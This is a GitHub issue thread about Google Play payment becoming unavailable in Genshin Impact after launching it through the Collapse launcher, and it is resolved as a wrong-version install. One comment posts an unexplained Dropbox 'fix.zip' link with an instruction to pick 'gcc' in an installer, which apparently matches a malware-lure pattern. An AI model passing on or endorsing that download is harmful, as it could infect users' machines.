### ISSUE TITLE
[Bug]: Google Play Payment become unavailable after launching with Collapse

### ISSUE THREAD

**Issue by cabera2** [CollapseLauncher/Collapse#564]
### Affected Version

1.80.19

### Bug Behavior

When you Install Genshin with [Google Play Games(Beta)](https://play.google.com/googleplaygames)(a.k.a Google Launcher), you can use Google Pay for Ingame Purchase. the allows you to get google play points or use discount coupons.
but if you run the game with Collapse once, this option become unavailable even when you run the game with Google Launcher again

### Expected Behavior

I think it will be best I can freely choose between 2 payment method.
I wish it work like this

Method 1: If you launch game with Collapse, Normal PC version payment method become available, and If you launch game with Google Launcher, Google payment method become available.

Method 2: You can switch which payment method to you from collapsesetting.

### Steps to reproduce

1. When you Install Genshin with [Google Play Games(Beta)](https://play.google.com/googleplaygames), you can use Google Pay for Ingame Purchase. the allows you to get google play points or use discount coupons.
(But also, you can't use other payment method except Google Pay)

2. After locate the path of Google version of game with Collapse, You can run the game without reinstall.

3. But if you run the game with collapse once, Google Pay method become unavailable and normal PC payment method become available.

4. After you run the game with collapse once, Google Pay method still not available even if you run the game with Google Play Games(Beta) again

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by cabera2** [comment]
> Download https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 In the installer menu, select "gcc."

Can't open link.
and what's this for?

**Comment by studiobuttermedia** [comment]
Just wondering. Are you downloading from the Google Play Games Launcher or the HoYoPlay Google Launcher/Collapse Launcher Google Play Region?

Because for me the Google Play Payment works. 
If you using the one from Google Play Games for PC then it's the wrong version

**Comment by studiobuttermedia** [comment]
You can either download the HoYoPlay - Google Play Launcher [here](https://play.google.com/store/apps/details?id=com.miHoYo.GenshinImpact) or download the Google Play version from Collapse from the Screenshots below

- Choose Google Play Region
![image](https://github.com/user-attachments/assets/200e769e-9e5a-4e80-ac70-2d36b5170c6d)

- And Start Installing from here
![image](https://github.com/user-attachments/assets/277bd147-14c6-4bbb-ab20-3531f0692f67)

**Comment by studiobuttermedia** [comment]
If you using the Google Play region, when making payment, it will open a new Browser window to make payments. If when you make payment and the in-game Google Play Payment appears then you are using the Google Play Emulator. 

FYI: The Google Play Games for PC Launcher is basically an emulator that optimized for PC gaming and has Games that also optimized for PC.

**Comment by cabera2** [comment]
Oh, I didn't noticed. Thank you. It was my mistake.
